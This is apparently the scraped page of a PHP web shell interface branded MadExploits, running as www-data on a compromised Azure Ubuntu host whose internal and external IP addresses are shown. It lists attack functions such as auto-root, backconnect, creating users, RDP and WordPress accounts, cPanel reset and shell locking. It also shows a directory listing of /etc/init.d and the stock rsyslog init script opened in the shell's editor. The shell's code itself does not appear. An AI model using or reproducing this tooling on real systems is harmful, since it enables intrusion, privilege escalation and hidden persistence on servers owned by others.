Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.16.137.150
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init.d /
[ HOME SHELL ]
Name
Size
Permission
Action
acpid
2.22
KB
-rwxr-xr-x
apache-htcacheclean
2.43
KB
-rwxr-xr-x
apache2
7.99
KB
-rwxr-xr-x
apparmor
4.23
KB
-rwxr-xr-x
apport
2.85
KB
-rwxr-xr-x
atd
1.05
KB
-rwxr-xr-x
boottimemirroring_phase1
3.45
KB
-rwxrwx---
boottimemirroring_phase2
3.45
KB
-rwxrwx---
console-setup.sh
1.2
KB
-rwxr-xr-x
cron
2.98
KB
-rwxr-xr-x
cryptdisks
937
B
-rwxr-xr-x
cryptdisks-early
978
B
-rwxr-xr-x
dbus
2.75
KB
-rwxr-xr-x
ebtables
4.38
KB
-rwxr-xr-x
grub-common
985
B
-rwxr-xr-x
hwclock.sh
3.72
KB
-rwxr-xr-x
irqbalance
2.39
KB
-rwxr-xr-x
iscsid
1.47
KB
-rwxr-xr-x
keyboard-setup.sh
1.44
KB
-rwxr-xr-x
kmod
2
KB
-rwxr-xr-x
lvm2
695
B
-rwxr-xr-x
lvm2-lvmetad
571
B
-rwxr-xr-x
lvm2-lvmpolld
586
B
-rwxr-xr-x
lxcfs
2.32
KB
-rwxr-xr-x
lxd
2.19
KB
-rwxr-xr-x
mdadm
2.59
KB
-rwxr-xr-x
mdadm-waitidle
1.22
KB
-rwxr-xr-x
mysql
5.48
KB
-rwxr-xr-x
netdata
2.39
KB
-rwxr-xr-x
open-iscsi
2.44
KB
-rwxr-xr-x
open-vm-tools
1.8
KB
-rwxr-xr-x
plymouth
1.33
KB
-rwxr-xr-x
plymouth-log
752
B
-rwxr-xr-x
procps
1.16
KB
-rwxr-xr-x
rsync
4.25
KB
-rwxr-xr-x
rsyslog
2.8
KB
-rwxr-xr-x
screen-cleanup
1.19
KB
-rwxr-xr-x
ssh
3.75
KB
-rwxr-xr-x
uarespawnd
2.09
KB
-rwxr-xr-x
udev
5.83
KB
-rwxr-xr-x
ufw
2.03
KB
-rwxr-xr-x
unattended-upgrades
1.36
KB
-rwxr-xr-x
uuidd
1.28
KB
-rwxr-xr-x
vxagent
4.58
KB
-rwxrwx--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rsyslog
#! /bin/sh ### BEGIN INIT INFO # Provides: rsyslog # Required-Start: $remote_fs $time # Required-Stop: umountnfs $time # X-Stop-After: sendsigs # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: enhanced syslogd # Description: Rsyslog is an enhanced multi-threaded syslogd. # It is quite compatible to stock sysklogd and can be # used as a drop-in replacement. ### END INIT INFO # # Author: Michael Biebl <biebl@debian.org> # # PATH should only include /usr/* if it runs after the mountnfs.sh script PATH=/sbin:/usr/sbin:/bin:/usr/bin DESC="enhanced syslogd" NAME=rsyslog RSYSLOGD=rsyslogd DAEMON=/usr/sbin/rsyslogd PIDFILE=/run/rsyslogd.pid SCRIPTNAME=/etc/init.d/$NAME # Exit if the package is not installed [ -x "$DAEMON" ] || exit 0 # Read configuration variable file if it is present [ -r /etc/default/$NAME ] && . /etc/default/$NAME # Define LSB log_* functions. . /lib/lsb/init-functions do_start() { # Return # 0 if daemon has been started # 1 if daemon was already running # other if daemon could not be started or a failure occured start-stop-daemon --start --quiet --pidfile $PIDFILE --exec $DAEMON -- $RSYSLOGD_OPTIONS } do_stop() { # Return # 0 if daemon has been stopped # 1 if daemon was already stopped # other if daemon could not be stopped or a failure occurred start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile $PIDFILE --exec $DAEMON } # # Tell rsyslogd to close all open files # do_rotate() { start-stop-daemon --stop --signal HUP --quiet --pidfile $PIDFILE --exec $DAEMON } create_xconsole() { XCONSOLE=/dev/xconsole if [ "$(uname -s)" != "Linux" ]; then XCONSOLE=/run/xconsole ln -sf $XCONSOLE /dev/xconsole fi if [ ! -e $XCONSOLE ]; then mknod -m 640 $XCONSOLE p chown root:adm $XCONSOLE [ -x /sbin/restorecon ] && /sbin/restorecon $XCONSOLE fi } sendsigs_omit() { OMITDIR=/run/sendsigs.omit.d mkdir -p $OMITDIR ln -sf $PIDFILE $OMITDIR/rsyslog } case "$1" in start) log_daemon_msg "Starting $DESC" "$RSYSLOGD" create_xconsole do_start case "$?" in 0) sendsigs_omit log_end_msg 0 ;; 1) log_progress_msg "already started" log_end_msg 0 ;; *) log_end_msg 1 ;; esac ;; stop) log_daemon_msg "Stopping $DESC" "$RSYSLOGD" do_stop case "$?" in 0) log_end_msg 0 ;; 1) log_progress_msg "already stopped" log_end_msg 0 ;; *) log_end_msg 1 ;; esac ;; rotate) log_daemon_msg "Closing open files" "$RSYSLOGD" do_rotate log_end_msg $? ;; restart|force-reload) $0 stop $0 start ;; try-restart) $0 status >/dev/null 2>&1 && $0 restart ;; status) status_of_proc -p $PIDFILE $DAEMON $RSYSLOGD && exit 0 || exit $? ;; *) echo "Usage: $SCRIPTNAME {start|stop|rotate|restart|force-reload|try-restart|status}" >&2 exit 3 ;; esac :
Close